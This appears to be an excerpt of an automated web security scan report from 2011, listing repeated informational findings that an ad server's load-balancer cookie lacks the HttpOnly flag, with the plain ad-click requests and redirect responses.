HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:40:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:51:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:02:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:18:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-ser
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:05:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:41:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

14.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:36:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
